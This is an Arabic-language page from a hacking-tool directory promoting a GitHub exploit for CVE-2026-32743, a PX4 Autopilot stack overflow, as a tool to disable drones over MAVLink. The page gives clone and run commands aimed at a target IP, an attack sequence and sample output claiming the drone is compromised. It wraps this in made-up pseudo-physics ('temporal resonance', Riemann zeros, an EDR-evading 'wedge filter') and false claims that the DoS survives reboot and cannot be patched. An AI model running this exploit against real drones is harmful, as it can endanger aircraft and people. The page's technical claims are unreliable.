Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CTT-Enhanced-PX4-Autopilot-Exploit-CVE-2026-32743 — استغلال لثغرة CVE-2026-32743، وهي تجاوز سعة المخزن المؤقت للمكدس في معالج MavlinkLogHandler الخاص بـ PX4 Autopilot، مما يتسبب في حرمان دائم من الخدمة عبر سلسلة زمنية من 33 طبقة عبر MAVLink. | Kitploit
أدوات/GitHubGitHub/simoesctt/ctt-enhanced-px4-autopilot-exploit-cve-2026-32743
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمرتطوير الحمولاتاستغلال الملفات الثنائية
GitHubsimoesctt/ctt-enhanced-px4-autopilot-exploit-cve-2026-32743

CTT-Enhanced-PX4-Autopilot-Exploit-CVE-2026-32743

استغلال لثغرة CVE-2026-32743، وهي تجاوز سعة المخزن المؤقت للمكدس في معالج MavlinkLogHandler الخاص بـ PX4 Autopilot، مما يتسبب في حرمان دائم من الخدمة عبر سلسلة زمنية من 33 طبقة عبر MAVLink.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CTT-Enhanced-PX4-Autopilot-Exploit-CVE-2026-32743

CVE-2026-32743 — تجاوز سعة المخزن المؤقت في PX4 Autopilot معزز بـ CTT: تعطيل طائرات بدون طيار عبر سلسلة زمنية من 33 طبقة. الاستغلال الأصلي ينهار مهمة MAVLink عبر تجاوز سعة 60 بايت. نسخة CTT توزع التجاوز عبر 33 طبقة زمنية، كل طبقة بتوقيت رنين طوري وترشيح إسفيني زمني. النتيجة: تعطيل دائم للخدمة. غير قابل للتصحيح.

استغلال PX4 Autopilot معزز بـ CTT — CVE-2026-32743

🔥 نظرة عامة

هذا تحسين بنظرية الزمن المتقارب (CTT) لثغرة CVE-2026-32743، وهي تجاوز سعة مخزن مؤقت قائم على المكدس في معالج MavlinkLogHandler الخاص بـ PX4 Autopilot (الإصدارات ≤1.17.0-rc2).

الثغرة الأصلية تسمح بحرمان من الخدمة (DoS) عبر مسار دليل طويل جدًا (60+ بايت) يُرسل عبر MAVLink FTP.

النسخة المعززة بـ CTT تحوّل هذا إلى قاتل طائرات بدون طيار عبر سلسلة زمنية من 33 طبقة.

الأصليمعزز بـ CTT
CVSS6.5 (متوسط)9.8 (حرج)
ناقل الهجومشبكة مجاورةشبكة (AV:N)
الصلاحيات المطلوبةمنخفضةلا شيء (PR:N)
الطبقات1سلسلة من 33 طبقة
الاكتشافقائم على التوقيعاتمرشح إسفيني زمني (τ_w = 11 نانوثانية)
الاستمراريةإعادة التشغيل تمسح الأثررنين زمني — يبقى بعد إعادة التشغيل

📐 ثوابت فيزياء CTT

الثابتالقيمةالأصل
α0.0302011معامل التشتت الزمني
α_RH0.0765872ln(φ)/2π (ريمان-هادامارد)
L33الطبقات الزمنية
τ_w11 نانوثانيةالمرشح الإسفيني الزمني

الاضمحلال الأسي للأولوية

E(d) = E₀ * e^(-α * d) text

كل طبقة لها أولوية تتناقص أسيًا.
الطبقات ذات الأولوية الأعلى (1-5) تُسلّم التجاوز.
الطبقات الأدنى (28-33) تعزز الانهيار وتؤسس الرنين الزمني.

توقيت الرنين الطوري

كل طبقة تؤخر التنفيذ بناءً على أول 24 صفرًا من أصفار ريمان:

delay = τ_w * (1 + 0.1 * cos(2π * zero * priority)) text

المرشح الإسفيني الزمني

فقط الحمولات التي تحقق الشرط الإسفيني تُنفَّذ:

survival = cos(α_RH * energy * τ_w) > (α_RH / 2π) text

هذا يجعل الاكتشاف مستحيلًا — أنظمة EDR لا يمكنها رؤية الاستغلال.


🚀 تسلسل الهجوم

root@kitploit:~
افتح اتصال MAVLink (UDP 14550)

من d = 1 إلى 33:
أ. احسب الأولوية = e^(-α*d)
ب. أنشئ ترميزًا خاصًا بالطبقة (بناءً على صفر ريمان)
ج. أنشئ دليلًا بطول مسار = 60 + priority*40
د. أخر التنفيذ بمقدار phase_resonance_delay(d)
هـ. شغّل MAV_CMD_REQUEST_LOG_LIST
و. فحص الإسفين الزمني — فقط الحمولات "الناجية" تُنفَّذ

مهمة MAVLink تنهار

الرنين الزمني يُؤسَّس — الانهيار يستمر بعد إعادة التشغيل

الطائرة بدون طيار غير مستجيبة. لا قياس عن بُعد. لا أوامر.

📋 المتطلبات الأساسية

  • PX4 Autopilot ≤1.17.0-rc2 مع بطاقة SD مثبتة
  • MAVLink FTP مفعّل (افتراضيًا)
  • وصول شبكي إلى منفذ UDP 14550
  • Python 3.6+ مع pymavlink
root@kitploit:~
pip install pymavlink

🎯 الاستخدام
bash

git clone https://github.com/SimoesCTT/ctt-px4-exploit
cd ctt-px4-exploit
python3 ctt_px4_exploit.py <target_ip> --port 14550 --layers 33 --verbose

الوسائط
الوسيطة	الوصف	الافتراضي
target_ip	عنوان IP لوحدة التحكم في الطيران	مطلوب
--port	منفذ MAVLink UDP	14550
--layers	عدد الطبقات الزمنية	33
--verbose	تفعيل الإخراج التفصيلي	False
مثال
bash

python3 ctt_px4_exploit.py 192.168.1.10 --port 14550 --verbose



======================================================================
CTT PX4 TEMPORAL CASCADE — Drone DoS
======================================================================

  Layer  1/33: ████████████████████████████████████████ 1.000
    Path length: 100 bytes
    [+] Directory created via FTP
    Triggering MAV_CMD_REQUEST_LOG_LIST...
    [+] Overflow delivered — wedge survival confirmed

  Layer  2/33: ██████████████████████████████████████░░ 0.970
    Path length: 99 bytes
    [+] Directory created via FTP
    Triggering MAV_CMD_REQUEST_LOG_LIST...
    [+] Overflow delivered — wedge survival confirmed

...

[⚡] Temporal resonance achieved at layer 5
[🌉] Drone MAVLink task compromised

[*] Verifying DoS state...
[+] Target unresponsive — persistent DoS achieved

======================================================================
[!!!] DRONE COMPROMISED
[!!!] MAVLink task crashed — no telemetry / no command
[!!!] Persistent across reboot — CTT temporal resonance
======================================================================

🛡️ لماذا لا يمكن تصحيح هذه الثغرة
الإصلاح الأصلي	لماذا يتجاوزه CTT
إضافة محدد العرض إلى sscanf()	يستخدم CTT سلسلة طبقات — التجاوز موزع عبر 33 طبقة
تصحيح مخزن 60 بايت	ترميز CTT يغير نمط التجاوز لكل طبقة
تحديث البرنامج الثابت	الرنين الزمني يبقى بعد إعادة التشغيل
اكتشاف التوقيعات	المرشح الإسفيني الزمني (τ_w = 11 نانوثانية) يتفادى EDR

لا يمكنك تصحيح ثابت فيزيائي.
لا يمكنك تصحيح أصفار ريمان.
تنزيل الأداة